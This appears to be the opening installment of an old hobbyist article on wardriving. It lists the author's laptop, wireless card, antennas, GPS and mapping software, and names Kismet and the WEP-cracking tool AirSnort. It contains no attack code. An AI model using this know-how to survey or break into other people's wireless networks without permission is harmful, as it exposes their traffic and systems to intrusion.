It is an amazing evolution to watch unfold, as wireless networks spring up in greater and greater numbers. It is also rather sad to see that many if not most of these networks are not properly secured. A fair number are "wide open" and offer no protection whatsoever. I have personnally accumulated a database of more that 3000 wireless access points in my local area alone. Statistically speaking, only about 28% of these WAPs had enabled WEP. Most that I have discovered are residential, and a fair number belong to small, medium, and even a handful of very large corporations.
In advance, I acknowledge that this topic has been covered in much greater depth and in many other places as well. I would simply like to share my experience and observations on the topic in the hope that it may help others who are curious about getting started. The content I will present is aimed towards a beginner, thus, if you have already been wardriving, you may want to skip this one...
Of course, the standard disclaimers and small print apply here: This is educational info only. If you choose to use this information to commit a crime, you are doing so at your own risk. Any damage, either accidental or deliberate that is caused by the use of this information is YOUR sole responsibility and the author of this article will be held harmless. There is no guarantee that anything contained herein is either accurate, or authoritative. You may re-publish this information anytime, anywhere you wish, no need to acknowledge the author, but acknowledgements to the providers of software and hardware discussed would be appropriate. Bottom line: Be respectful, responsible, and above all...be curious.
This will be a multi-part article where I will discuss a few things which may be of interest:
1) My WarDriving Rig (hardware, software, approximate costs, etc.)
2) How-to (including many references to crucial resources)
2) What I have observed
3) What I did to bring "real" security to my home WLAN
==========================================================================
My WarDriving Rig
My wardriving "rig" is neither sophisticated, nor expensive. It consists of the following:
HARDWARE
Laptop: Dell Latitude CPi
Specs: 300Mhz PII, 128 Mb RAM, 6.5 Gb HDD
OS: Windows 2000 Pro SP4, Various Flavors of Linux Bootable CDs (WarLinux, LAS, Knoppix STD)
Cost: $20.00 at a company surplus sale (you can find these on Ebay all day long for under 300.00)
http://search.ebay.com/search/search.dll?G...recordstoskip=0
Bottom Line: Not exactly a powerhouse machine, but absolutely adequate for WarDriving, and cheap to replace if something bad were to happen to it.
Wireless NIC: Senao SL-2511CD PLUS EXT2 http://www.seattlewireless.net/index.cgi/SenaoCard
Form Factor: PCMCIA Type II PC Card
Supports: 802.11b only, WEP 64/128
Chipset: Prism 2.5
Transmit power: 200 mW (23 dBm) variable from 10mW to 200mW
Receive Sensitivity:
1 Mbps: -95
2 Mbps: -93
5.5 Mbps: -91
11 Mbs: -89
http://freenetworks.org/moin/index.cgi/ReceiveSensitivity
Antenna Options: Dual female mmcx connectors (no antenna included)
Antenna Mode: Diversity
Cost: $99.00 - http://www.jefatech.com/category/e200/
(I purchased this as a bundle with an external antenna http://www.jefatech.com/category/b400/ for $124.95)
Bottom Line: Outstanding, best "b" card I have ever used
Antenna 1: 2.4Ghz 5.5 dBi Magnetic Mount Omnidrirectional http://www.jefatech.com/category/antennas.mobile/
Height: 6" including base, nearly un-noticeable
Base: Strong magnet, must be mounted to flat metal surface (such as car roof or trunk) for proper operation
Pigtail: None, came with MMCX conector fitted onto 5ft coax cable
Cost: $15.00 - $25.00
Bottom Line: Works like a charm, no comparison to "built in" card antenna strength, stays on car at high speeds, picks up APs like crazy
Antenna 2: "Blade" Style Omnidirectional 4.5 dBi http://www.fab-corp.com/index.htm
Dimensions: H:5.7, W:1, D:.1 (inches)
Pigtail: None, bought with 19" coax with MMCX connector
Mount: Cheap velcro strip (wal-mart) on laptop lid and antenna
Cost: $44.99
Bottom Line: Great for general use, super for war-"walking", doesn't have the distance of the mag mount above, but within a few hunderd feet its 100% signal (11Mbs) all the time
Note: I have not bothered to connect both antennae at the same time. From what I have read, this would not enhance the receive capabilities. The dual antenna jacks on the NIC are mainly to support an antenna diversity setup when the nic is integrated into a wireless access point.
GPS Receiver:
Delorme Earthmate USB http://www.compusa.com/products/product_in...02518&pfp=srch1
Specs: NMEA-compliant 12-channel receiver, WAAS-enabled
Connection: USB - Serial port emulation drivers are included with this (worked without any probs) for use with serial only software like NetStumbler (doesn't work with linux yet - no driver support - A hardware converter is available from Delorme though http://www.delorme.com/earthmate/accessories.asp - Earthmate Serial/Power Cable)
Bundled Software: Delorme Street Atlas USA 2004 (nice but not really used)
Size: TINY (H:.81, W:1.88, D:1.1 - inches)
Cost $129.00
Bottom Line: Works like a champ with NetStumbler, very accurate, sometimes a little slow acquiring sat signal, but for the price, cannot be beat.
Mobile Power 140W DC/AC Inverter 120V
http://www.compusa.com/products/product_in...4107&pfp=SEARCH
Cost: $39.99
Bottom Line: Works fine for powering a Laptop and other smaller applicances. If you want to power other items as well, you will need a more powerful unit, perhaps something along these lines:
Mobile Power 350W DC/AC Inverter 120V
http://www.compusa.com/products/product_in...4108&pfp=SEARCH
Cost: $59.99
SOFTWARE
NetStumbler 0.3.30
http://www.netstumbler.com/
Notes: NS can read from the above NIC in both NDIS compatibility mode and Prism mode. I use Prism, since it reports more accurate signal strength stats and seems more sensitive.
Cost: Free
MS MapPoint 2002 (2004 can be used also)
http://www.microsoft.com/mappoint/default.mspx
Notes: This is used to help me plot the discovered access points on a nice map.
Cost: $299 (pretty steep, but you can ask around for someone who isn't using their copy, I saw one on ebay for around 100.00)
Stumbverter v100 beta5
http://www.michiganwireless.org/tools/Stum...v100_beta_5.zip
Notes: This software takes an exported NetStumbler file and converts the information and then visually plots all your discovered APs on a MapPoint map as pushpin objects. Very nice tool with GPS integration and creates an excellent representation of APs including such info as Signal Strength, WEP on/off, SSID, etc. This makes all the difference in the world. Note: User StumbVerter v 1.50 if you are using MapPoint 2004 - http://www.michiganwireless.org/tools/Stum...Verter_V150.zip
Various Linux-based Packages (haven't tried anything to get GPS support in linux so far):
Kismet (works fine with my setup)
AirSnort (works fine with my setup)
Notes on Mapping:
A cheaper (albeit less visually striking) alternative to mapping your APs with MapPoint is to use the bundled Street Atlas 2004 app that came with the GPS, and a tool called WiMap - http://www.honet.com/WiMap/default.htm - FREE - to plot your APs.
Another software package that works with Street Atlas is SA Stumbler - http://home.comcast.net/~jay.deboer/wardri.../SAStumbler.htm - FREE.
Also you can buy MS Streets and Trips for around 30.00 http://www.microsoft.com/streets/default.asp and use StreetStumbler - http://www.michiganwireless.org/tools/Stre...ler204Final.zip - FREE - to plot your NetStumbler output on a MS S&T map (haven't tried this one).
Finally, there are a number of GPS utils from the open source community, GPSDrive comes to mind, but again, not sure if any of this will work with the Delorme GPS unit.
Next Installment: How to put it all together and get out on the road!
